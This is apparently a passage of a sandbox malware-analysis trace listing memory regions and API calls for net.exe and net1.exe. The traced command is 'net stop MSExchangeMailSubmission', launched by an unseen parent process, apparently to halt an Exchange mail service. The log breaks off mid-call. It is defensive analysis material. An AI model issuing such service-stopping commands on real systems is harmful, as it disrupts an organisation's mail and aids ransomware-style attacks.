mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 651 os_tid = 0x954 Thread: id = 652 os_tid = 0x8c8 Thread: id = 653 os_tid = 0x930 Process: id = "215" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x13382000" os_pid = "0x9a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "213" os_parent_pid = "0x854" cmd_line = "net stop MSExchangeMailSubmission" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10643 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 10644 start_va = 0x440000 end_va = 0x443ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 10645 start_va = 0x4440000 end_va = 0x445ffff entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 10646 start_va = 0x4460000 end_va = 0x4461fff entry_point = 0x0 region_type = private name = "private_0x0000000004460000" filename = "" Region: id = 10647 start_va = 0x4470000 end_va = 0x4483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004470000" filename = "" Region: id = 10648 start_va = 0x4490000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 10649 start_va = 0x44d0000 end_va = 0x454ffff entry_point = 0x0 region_type = private name = "private_0x00000000044d0000" filename = "" Region: id = 10650 start_va = 0x4550000 end_va = 0x4553fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004550000" filename = "" Region: id = 10651 start_va = 0x4560000 end_va = 0x4560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004560000" filename = "" Region: id = 10652 start_va = 0x4570000 end_va = 0x4571fff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 10653 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10654 start_va = 0x7eca0000 end_va = 0x7ecc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eca0000" filename = "" Region: id = 10655 start_va = 0x7ecca000 end_va = 0x7eccafff entry_point = 0x0 region_type = private name = "private_0x000000007ecca000" filename = "" Region: id = 10656 start_va = 0x7eccc000 end_va = 0x7eccefff entry_point = 0x0 region_type = private name = "private_0x000000007eccc000" filename = "" Region: id = 10657 start_va = 0x7eccf000 end_va = 0x7eccffff entry_point = 0x0 region_type = private name = "private_0x000000007eccf000" filename = "" Region: id = 10658 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10659 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10660 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10661 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10662 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10663 start_va = 0x4590000 end_va = 0x459ffff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 10664 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10665 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10666 start_va = 0x4640000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 10667 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 655 os_tid = 0x948 Thread: id = 656 os_tid = 0x560 Process: id = "216" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x29ced000" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "215" os_parent_pid = "0x9a0" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMailSubmission" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10668 start_va = 0xc20000 end_va = 0xc3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 10669 start_va = 0xc40000 end_va = 0xc41fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 10670 start_va = 0xc50000 end_va = 0xc63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c50000" filename = "" Region: id = 10671 start_va = 0xc70000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 10672 start_va = 0xcb0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 10673 start_va = 0xd30000 end_va = 0xd33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 10674 start_va = 0xd40000 end_va = 0xd40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 10675 start_va = 0xd50000 end_va = 0xd51fff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 10676 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 10677 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 10678 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10679 start_va = 0x7f5f0000 end_va = 0x7f612fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5f0000" filename = "" Region: id = 10680 start_va = 0x7f615000 end_va = 0x7f615fff entry_point = 0x0 region_type = private name = "private_0x000000007f615000" filename = "" Region: id = 10681 start_va = 0x7f61a000 end_va = 0x7f61afff entry_point = 0x0 region_type = private name = "private_0x000000007f61a000" filename = "" Region: id = 10682 start_va = 0x7f61d000 end_va = 0x7f61ffff entry_point = 0x0 region_type = private name = "private_0x000000007f61d000" filename = "" Region: id = 10683 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10684 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10685 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 10686 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10687 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 10688 start_va = 0xdc0000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000dc0000" filename = "" Region: id = 10689 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10690 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10691 start_va = 0x5280000 end_va = 0x537ffff entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 10692 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10693 start_va = 0xc20000 end_va = 0xc2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 10694 start_va = 0xc30000 end_va = 0xc33fff entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 10695 start_va = 0xd60000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 10696 start_va = 0xdd0000 end_va = 0xe8dfff entry_point = 0xdd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10697 start_va = 0xe90000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 10698 start_va = 0xf70000 end_va = 0xf7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f70000" filename = "" Region: id = 10699 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 10700 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 10701 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 10702 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 10703 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 10704 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 10705 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 10706 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 10707 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10708 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10709 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10710 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10711 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10712 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10713 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10714 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10715 start_va = 0x7f4f0000 end_va = 0x7f5effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4f0000" filename = "" Region: id = 10716 start_va = 0x7f617000 end_va = 0x7f619fff entry_point = 0x0 region_type = private name = "private_0x000000007f617000" filename = "" Region: id = 10717 start_va = 0xc40000 end_va = 0xc43fff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 10718 start_va = 0xda0000 end_va = 0xda2fff entry_point = 0xda0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 10719 start_va = 0xf10000 end_va = 0xf41fff entry_point = 0xf10000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 657 os_tid = 0x910 [0137.409] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0137.409] __set_app_type (_Type=0x1) [0137.409] __p__fmode () returned 0x77ac4d6c [0137.409] __p__commode () returned 0x77ac5b1c [0137.409] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0137.409] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0137.410] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0137.410] GetConsoleOutputCP () returned 0x1b5 [0137.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0137.410] SetThreadUILanguage (LangId=0x0) returned 0x409 [0137.412] sprintf_s (in: _DstBuf=0xd2fa58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0137.413] setlocale (category=0, locale=".437") returned="English_United States.437" [0137.414] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0137.414] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0137.414] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMailSubmission" [0137.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xd2f800, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0137.414] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xd2f7f4 | out: Buffer=0xd2f7f4*=0x5287f78) returned 0x0 [0137.414] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xd2f7f8 | out: Buffer=0xd2f7f8*=0x5287f90) returned 0x0 [0137.414] __iob_func () returned 0x77ac1208 [0137.414] _fileno (_File=0x77ac1208) returned 0 [0137.414] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0137.414] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0137.414] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0137.414] _wcsicmp (_String1="config", _String2="stop") returned -16 [0137.414] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0137.414] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0137.414] _wcsicmp (_String1="file", _String2="stop") returned -13 [0137.414] _wcsicmp (_String1="files", _String2="stop") returned -13 [0137.414] _wcsicmp (_String1="group", _String2="stop") returned -12 [0137.414] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0137.414] _wcsicmp (_String1="help", _String2="stop") returned -11 [0137.414] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0137.414] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0137.414] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0137.414] _wcsicmp (_String1="session", _String2="stop") returned -15 [0137.414] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0137.414] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0137.414] _wcsicmp (_String1="share", _String2="stop") returned -12 [0137.414] _wcsicmp (_String1="start", _String2="stop") returned -14 [0137.414] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0137.414] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0137.414] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0137.414] _wcsicmp (_String1="accounts", _String2="MSExchangeMailSubmission") returned -12 [0137.414] _wcsicmp (_String1="computer", _String2="MSExchangeMailSubmission") returned -10 [0137.414] _wcsicmp (_String1="config", _String2="MSExchangeMailSubmission") returned -10 [0137.414] _wcsicmp (_String1="continue", _String2="MSExchangeMailSubmission") returned -10 [0137.414] _wcsicmp (_String1="cont", _String2="MSExchangeMailSubmission") returned -10 [0137.414] _wcsicmp (_String1="file", _String2="MSExchangeMailSubmission") returned -7 [0137.414] _wcsicmp (_String1="files", _String2="MSExchangeMailSubmission") returned -7 [0137.414] _wcsicmp (_String1="group", _String2="MSExchangeMailSubmission") returned -6 [0137.414] _wcsicmp (_String1="groups", _String2="MSExchangeMailSubmission") returned -6 [0137.414] _wcsicmp (_String1="help", _String2="MSExchangeMailSubmission") returned -5 [0137.414] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMailSubmission") returned -5 [0137.414] _wcsicmp (_String1="localgroup", _String2="MSExchangeMailSubmission") returned -1 [0137.414] _wcsicmp (_String1="pause", _String2="MSExchangeMailSubmission") returned 3 [0137.415] _wcsicmp (_String1="session", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="sessions", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="sess", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="share", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="start", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="stats", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="statistics", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="stop", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="time", _String2="MSExchangeMailSubmission") returned 7 [0137.415] _wcsicmp (_String1="user", _String2="MSExchangeMailSubmission") returned 8 [0137.415] _wcsicmp (_String1="users", _String2="MSExchangeMailSubmission") returned 8 [0137.415] _wcsicmp (_String1="msg", _String2="MSExchangeMailSubmission") returned 2 [0137.415] _wcsicmp (_String1="messenger", _String2="MSExchangeMailSubmission") returned -14 [0137.415] _wcsicmp (_String1="receiver", _String2="MSExchangeMailSubmission") returned 5 [0137.415] _wcsicmp (_String1="rcv", _String2="MSExchangeMailSubmission") returned 5 [0137.415] _wcsicmp (_String1="netpopup", _String2="MSExchangeMailSubmission") returned 1 [0137.415] _wcsicmp (_String1="redirector", _String2="MSExchangeMailSubmission") returned 5 [0137.415] _wcsicmp (_String1="redir", _String2="MSExchangeMailSubmission") returned 5 [0137.415] _wcsicmp (_String1="rdr", _String2="MSExchangeMailSubmission") returned 5 [0137.415] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeMailSubmission") returned 10 [0137.415] _wcsicmp (_String1="work", _String2="MSExchangeMailSubmission") returned 10 [0137.415] _wcsicmp (_String1="wksta", _String2="MSExchangeMailSubmission") returned 10 [0137.415] _wcsicmp (_String1="prdr", _String2="MSExchangeMailSubmission") returned 3 [0137.415] _wcsicmp (_String1="devrdr", _String2="MSExchangeMailSubmission") returned -9 [0137.415] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMailSubmission") returned -1 [0137.415] _wcsicmp (_String1="server", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="svr", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="srv", _String2="MSExchangeMailSubmission") returned 6 [0137.415] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeMailSubmission") returned -1 [0137.415] _wcsicmp (_String1="alerter", _String2="MSExchangeMailSubmission") returned -12 [0137.415] _wcsicmp (_String1="netlogon", _String2="MSExchangeMailSubmission") returned 1 [0137.415] _wcsupr (in: _String="MSExchangeMailSubmission" | out: _String="MSEXCHANGEMAILSUBMISSION") returned="MSEXCHANGEMAILSUBMISSION" [0137.415] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5282638 [0137.417] GetServiceKeyNameW (in: hSCManager=0x5282638, lpDisplayName="MSEXCHANGEMAILSUBMISSION", lpServiceName=0x10a8cb0, lpcchBuffer=0xd2f76c | out: lpServiceName="", lpcchBuffer=0xd2f76c) returned 0 [0137.417] _wcsicmp (_String1="msg", _String2="MSEXCHANGEMAILSUBMISSION") returned 2 [0137.417] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEMAILSUBMISSION") returned -14 [0137.417] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEMAILSUBMISSION") returned 5 [0137.417] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEMAILSUBMISSION") returned 5 [0137.417] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEMAILSUBMISSION") returned 5 [0137.417] _wcsicmp (_String1="redir", _String2="MSEXCHANGEMAILSUBMISSION") returned 5 [0137.417] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEMAILSUBMISSION") returned 5 [0137.417] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEMAILSUBMISSION") returned 10 [0137.417] _wcsicmp (_String1="work", _String2="MSEXCHANGEMAILSUBMISSION") returned 10 [0137.418] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEMAILSUBMISSION") returned 10 [0137.418] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEMAILSUBMISSION") returned 3 [0137.418] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEMAILSUBMISSION") returned -9 [0137.418] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEMAILSUBMISSION") returned -1 [0137.418] _wcsicmp (_String1="server", _String2="MSEXCHANGEMAILSUBMISSION") returned 6 [0137.418] _wcsicmp (_String1="svr", _String2="MSEXCHANGEMAILSUBMISSION") returned 6 [0137.418] _wcsicmp (_String1="srv", _String2="MSEXCHANGEMAILSUBMISSION") returned 6 [0137.418] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEMAILSUBMISSION") returned -1 [0137.418] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEMAILSUBMISSION") returned -12 [0137.418] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEMAILSUBMISSION") returned 1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="WORKSTATION") returned -10 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="LanmanWorkstation") returned 1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="SERVER") returned -6 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="LanmanServer") returned 1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="BROWSER") returned 11 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="BROWSER") returned 11 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="MESSENGER") returned 14 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="MESSENGER") returned 14 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="NETRUN") returned -1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="NETRUN") returned -1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="SPOOLER") returned -6 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="SPOOLER") returned -6 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="ALERTER") returned 12 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="ALERTER") returned 12 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="NETLOGON") returned -1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="NETLOGON") returned -1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="NETPOPUP") returned -1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="NETPOPUP") returned -1 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="SQLSERVER") returned -6 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="SQLSERVER") returned -6 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="REPLICATOR") returned -5 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="REPLICATOR") returned -5 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="REMOTEBOOT") returned -5 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="REMOTEBOOT") returned -5 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="TIMESOURCE") returned -7 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="TIMESOURCE") returned -7 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="AFP") returned 12 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="AFP") returned 12 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="UPS") returned -8 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="UPS") returned -8 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="XACTSRV") returned -11 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="XACTSRV") returned -11 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="TCPIP") returned -7 [0137.418] _wcsicmp (_String1="MSEXCHANGEMAILSUBMISSION", _String2="TCPIP") returned -7 [0137.418] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5286cd0 [0137.419] OpenServiceW (hSCManager=0x5286cd0, 